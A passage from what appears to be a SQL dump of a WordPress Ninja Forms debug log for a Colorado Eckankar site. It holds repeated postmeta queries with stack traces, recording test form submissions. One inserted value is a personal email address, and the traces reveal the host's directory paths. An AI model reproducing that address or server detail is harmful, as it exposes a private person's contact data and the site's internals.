do.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(63,32,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_302\' AND post_id = 162775',NULL,NULL),(64,32,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(65,33,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162775, \'_field_302\', \'Test-4\')',NULL,NULL),(66,33,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(67,34,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_303\' AND post_id = 162775',NULL,NULL),(68,34,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(69,35,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162775, \'_field_303\', \'Testing---4\')',NULL,NULL),(70,35,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(71,36,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_304\' AND post_id = 162775',NULL,NULL),(72,36,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(73,37,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162775, \'_field_304\', \'choll.03@comcast.net\')',NULL,NULL),(74,37,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(75,38,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_306\' AND post_id = 162775',NULL,NULL),(76,38,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(77,39,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162775, \'_field_306\', \'TEST___4\')',NULL,NULL),(78,39,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2181,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2103,\"function\":\"_insert_replace_helper\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":109,\"function\":\"insert\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":219,\"function\":\"add_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(79,40,'query','SELECT meta_id FROM wpcl_postmeta WHERE meta_key = \'_field_307\' AND post_id = 162775',NULL,NULL),(80,40,'trace','[{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"log_postmeta_query\",\"class\":\"Ninja_Forms\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":208,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":1871,\"function\":\"apply_filters\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/wp-db.php\",\"line\":2543,\"function\":\"query\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/meta.php\",\"line\":217,\"function\":\"get_col\",\"class\":\"wpdb\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/post.php\",\"line\":2061,\"function\":\"update_metadata\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":406,\"function\":\"update_post_meta\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":422,\"function\":\"_save_field_value\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Database/Models/Submission.php\",\"line\":286,\"function\":\"_save_field_values\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/Actions/Save.php\",\"line\":237,\"function\":\"save\",\"class\":\"NF_Database_Models_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":436,\"function\":\"process\",\"class\":\"NF_Actions_Save\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-content/plugins/ninja-forms/includes/AJAX/Controllers/Submission.php\",\"line\":128,\"function\":\"process\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":286,\"function\":\"submit\",\"class\":\"NF_AJAX_Controllers_Submission\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/class-wp-hook.php\",\"line\":310,\"function\":\"apply_filters\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-includes/plugin.php\",\"line\":465,\"function\":\"do_action\",\"class\":\"WP_Hook\",\"type\":\"->\"},{\"file\":\"/home/eckank5/eckankar-colorado.org/wp-admin/admin-ajax.php\",\"line\":173,\"function\":\"do_action\"}]',NULL,NULL),(81,41,'query','INSERT INTO `wpcl_postmeta` (`post_id`, `meta_key`, `meta_value`) VALUES (162775, \'_field_307\', \'YOUTH AND FAMILY -----    TEST 